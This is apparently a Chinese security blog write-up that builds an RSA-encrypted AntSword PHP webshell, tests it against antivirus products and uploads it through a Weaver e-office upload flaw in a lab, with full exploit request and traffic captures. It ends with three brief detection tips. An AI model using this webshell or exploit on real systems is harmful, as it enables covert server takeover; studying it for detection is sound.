中国蚁剑RSA非对称加密的攻与防
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,流量使用编码、解码器进行混淆可绕过WAF、IDS等检测系统,并且有多款实用插件灵活多样,为安全测试人员带来极大的便利,同时也受到很多人的青睐。
https://github.com/AntSwordProject/antSword
在线RSA生成网站
http://web.chacuo.net/netrsakeypair
生成公钥和私钥
AntSword v2.1.0版本开始,新增了PHP RSA编码器,蚁剑内置了一个编码器RSA模块,使用了RSA非对称加密进行传输,新建编码器 -> RSA配置 -> 点击生成公私钥,然后配置公钥、私钥、PHP代码,生成中国蚁剑连接专用webshell
编码器设置
生成的webshell检测是否免杀
D盾检测(可检测)
冰河webshell查杀(免杀)
火绒检测(免杀)
通过泛微e-office漏洞上传webshell
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 1289
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
--e64bdf16c554bbc109cecef6451c26a4--
webshell连接地址
测试方式(编码器RSA+解码器default)
http://10.211.55.9:8082/images/logo/logo-eoffice.php
测试连接成功
配置http代理抓包分析连接流量
代理配置(也可以Wireshark抓包分析)
第一个交互数据包
编码器RSA+解码器default
编码器RSA+解码器base64
编码器RSA+解码器rot13
对请求数据进行url解码、base64解码发现数据为乱码
通过分析编码器,发现传输的数据是通过RSA公钥进行加密,baas64编码进行传输的,从而实现了对流量的免杀。
连接流量分析
1、Base64:
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Length: 2810
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
ant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3D
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:37 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 118
Connection: close
Content-Type: text/html; charset=utf-8
721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472
2、chr
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Length: 2840
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3D
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:40 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 91
Connection: close
Content-Type: text/html; charset=utf-8
4629930P:/rbssvpr/jroebbg/vzntrf/ybtb P:Q: Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601 FLFGRZa9b886
3、default
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 2828
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3D
HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:34 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 92
Connection: close
Content-Type: text/html; charset=utf-8
a96ed3a93C:/eoffice/webroot/images/logo C:D: Windows NT YUNZUI-PC 6.1 build 7601 SYSTEM690a7
中国蚁剑工具从设计和使用角度加入了很多攻防对抗的思考。以下为三点检测建议:
第一,从从攻击入口检测RSA木马的上传,可以使用静态检测规则或者沙箱或webshell查杀引擎进行。(流量、行为等)
第二,检测中国蚁剑工具在流量测的强特征,具体可以从上述分析中研究提取。
第三,通过威胁狩猎进行全方位监控,发现异常进行全流量回溯,从而定位攻击。